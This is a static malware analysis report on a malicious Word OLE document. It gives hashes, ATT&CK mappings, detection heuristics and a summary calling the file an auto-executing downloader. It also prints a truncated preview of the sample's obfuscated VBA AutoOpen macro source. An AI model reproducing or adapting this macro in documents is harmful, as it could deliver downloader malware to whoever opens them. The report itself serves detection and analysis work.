Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 92c4cd0e6a3c4430…

MALICIOUS

Office (OLE)

Size: 195.0 KB
Created: 2018-09-25 10:45:00
Authoring application: Microsoft Office Word
First seen: 2019-03-10
MD5: 08d102ae21fba4346b541569d13b648f
SHA-1: cbcb954715a2360751904267813ce3f72404c9d7
SHA-256: 92c4cd0e6a3c4430cff511cd92a87bc7e0c398fb5fd38e661ed4cfe37477c941
Risk Score: 202

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample is a malicious Word (OLE) document containing a VBA macro. An AutoOpen macro is present, so its code runs automatically when the document is opened, and it calls the Shell() function, which indicates an attempt to execute an external command. ClamAV also classifies the file as a downloader (Doc.Downloader.00536d-6698374-0). Taken together, the AutoOpen macro and the Shell() call strongly suggest the intent is to download and execute a second-stage payload; the delivery vector is most likely a spearphishing attachment.

Heuristics (6)

  • ClamAV: Doc.Downloader.00536d-6698374-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.00536d-6698374-0
  • VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The VBA code calls Shell()
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    The VBA project contains an AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 198796 bytes
SHA-256: 6953747a869c96d1611b8ea642bb355f5d4f0ba2224f0db886dd448c223a20dd

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "dnMpabRzY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim EEicLL(1)
EEicLL(0) = Right(wsBBN + KphHmipDLGEOowjE + WLqNC, 851) + Mid(UwKjmzm + XPZObREGBiDDSFodqu + iHiMwY, 589, 208) + Mid(FLoTruul + qRiRjdjJJHuuHtEIhX + NzHUj, 270, 879) + MidB(mjiNd + wvzBSiHuYjBqdzLQUYft + ZCLEPh, 585, 564)
   Dim fNXGG(2)
fNXGG(0) = Left(DKwidTRI + CmbSjGwSlmuXaLZtj + zNMDi, 136) + Mid(ktkmii + wHKInLInYZsOjlp + FfYGJv, 7, 871) + Left(wbiDcmZ + wBDQJhOsfDBouRiDwr + wCczUE, 301) + Mid(FQoNB + YXhINGHjFCLEWzjFNhkS + DwwYFPA, 53, 388)
fNXGG(1) = MidB(KrErTVR + EXlYjdvAhoFYfmiapB + rFWHfOt, 238, 367) + Left(YjLXp + EBnqWlMhhmqYBvnMhwhGU + RGdzO, 870) + Left(wGwBj + lhMacfFdRFdinXuSUFQhTs + Eoqsia, 737) + Mid(uusWL + hIPbQZLjPQpUztKBoCZWCw + AXbwIb, 618, 14)
   Dim pwuqW(1)
pwuqW(0) = MidB(hbNurE + WsOmIEMrRQaOzIkivQk + wEnvi, 873, 264) + Mid(OZCvK + CkDYGjjSYpHHmIGp + sizEDX, 988, 465)
   Dim mapnf(1)
mapnf(0) = MidB(aLissbN + BMvHQBisjvSfrFRnCKXl + FioWhbwz, 703, 600) + Right(PvkvDvz + vTYUaJFUibRTKPLFwUuMn + VCGHc, 733) + Left(KPQBGR + QAqQwlRFjtwzAHkiXwNCoiwz + NFnXbi, 225) + Right(FkkBSs + ZJHfWiduCwBiNfaiGbV + oFSCmwuJ, 936)
   Dim lLjHH(1)
lLjHH(0) = Left(IWHiT + RPuFmVQYvjKRqYBiaDtKz + IwsWo, 806) + MidB(YsbViFu + lawWTkVipGjYFaMSuCGqK + faHrYj, 90, 122) + MidB(KpoNXr + swzmjEsbDkimBEuXQQ + ShWokXE, 441, 215) + Mid(SnStujmj + VtoYDJcUOjRShjTUXj + uTwjL, 17, 760)
   Dim QazbVB(2)
QazbVB(0) = MidB(ziGFbST + lCtjKCPTjTppOSMSQCmtS + DqiQLWt, 877, 515) + Mid(IGYjHoUl + PntQvjowIawZoRVwv + zTDRtjvw, 491, 625) + MidB(oClzQV + cMSqcKSXzoppZMdHCt + unFKWDR, 100, 528) + Right(LlAMoTWc + roJMMLmNHLbdXCnPGtND + EZApnj, 313)
QazbVB(1) = MidB(CzwzJ + SNdfkHcRDiNUlnzImmw + vBVVDaS, 580, 458) + Left(zariwwp + zCGbYNJAErWnBjjGqlEp + iKvSM, 819) + Left(pdtutw + SdTlELIvJojiMOWtDNho + zzYqotKQ, 466) + MidB(WGASmnW + NqqjjWDmEloFNASGP + JjSpIV, 511, 321)
   Dim AmUDt(2)
AmUDt(0) = Right(fSUwQKjJ + juvOfbDJmdXjNoSbC + VGjlO, 371) + Right(KzjSEPAz + tzjMTHzSCWROYYoitJI + bjnuQQ, 253)
AmUDt(1) = Mid(MJtXJmYf + kRtQvfrMRbjOknULj + hUUfVAOB, 191, 275) + Left(fDiPs + YAXUHXJYzETfjZwPjfdL + KiEKCX, 538) + Left(coKzMILr + FuOGkITdGFvHwsFwV + zhXGYZj, 134) + Left(nJBSwYTq + wPsjwrQPGsUadjdvikWj + jOoAU, 715)
   Dim WdwniP(2)
WdwniP(0) = Mid(vuqMGAV + kATLjTwpFEEwbjkzlRbTlkcm + nSczXQnK, 474, 802) + Left(woKcfwSK + GhwVIhbEhOwGFaLtaaF + TnIIEfT, 458) + MidB(MvACIGd + ckAhYAaHRBjADUXYWZ + haahEYCn, 934, 560) + MidB(BTGkI + MGPzLoAniEbLPGzTVwE + DjBKi, 281, 751)
WdwniP(1) = Right(RAjSbPpQ + ErBImHznpIJKviqdRY + juOKAiid, 100) + MidB(ZMBXPDhO + iHtGHjkmFqJCSOXUELDj + wtGbZ, 707, 192)
tXEVcoNjozLQc (KeyString(vLtjjLBN + cJDGm + 3 + 9 + 6 + 2 + 47 + ntoUk + FGUDM) + MfvLO + FwEcHMQ + KeyString(zQWrkMEZ + jaaqw + 3 + 10 + 7 + 2 + 55 + sQdIuXph + ksdqtkMX) + UiEZljFKzGi + GYrNLf + bufOcwjtVGa + awXuEAt + rGQfFU + ISHlZQo + ARcnK + ZajraDhon + kwYalIoo + vbbtnzFd + NkcKY + aVTjoMLmji + HHfah + diorHd + rQuSiX)
   Dim Snaqh(1)
Snaqh(0) = Mid(nNMJls + WOSjuAOomiEZDfaUpcGtdM + HjBnTF, 604, 97) + Right(icCDw + DJukhQKYEOPUkiHHlw + twaTPzRm, 575) + Mid(aCPhZulc + RpkSKUvrCFrLASBMHS + fPQUBiNA, 434, 328) + MidB(IpBEFzq + jirPvSjPnhhsFXTNdCjaM + RRwHKcz, 632, 926)
   Dim pqvLS(2)
pqvLS(0) = MidB(bYSjDQv + sCANtrVASfTWpSlfuLQEA + TpwiCv, 902, 185) + Left(XIVzViK + MEiUqliQZczAKfYVQjYNP + JQiZhF, 85) + Right(IkUGtXfU + iXwpYpJpOoqSDXbBrXtzTW + OcsEE, 557) + Left(wLaJkXQ + CRSRjSIzsZoZiSvNrKkOA + QoYRTHZ, 165)
pqvLS(1) = MidB(WufJk + ksuWhHZcDdiSwHBUZB + PRMOOi, 312, 60) + Right(wdHZE + wKrEvizEzXIPLaiEUtL + AWbTa, 205)
   Dim TYVcOa(1)
TYVcOa(0) = Left(vNjKqqj + TcaHIVSrHiCmrnvpWnZYJ + hkmSX, 866) + Left(muIZK + NWSwcWBPDuouDRjGnh + kllbEn, 741) + Right(mTZCGLw + jXOczVsrrsElziMrh + doKGZP, 830) + MidB(iOdwF + lNFMwWjWwoFXwtWtaS + GBtlJqmW, 615, 740)
   Dim FFPmQ(2)
FFPmQ(0) = MidB(QvPkwLh + JNAIfqSKnIcFJWUSN 
... (truncated)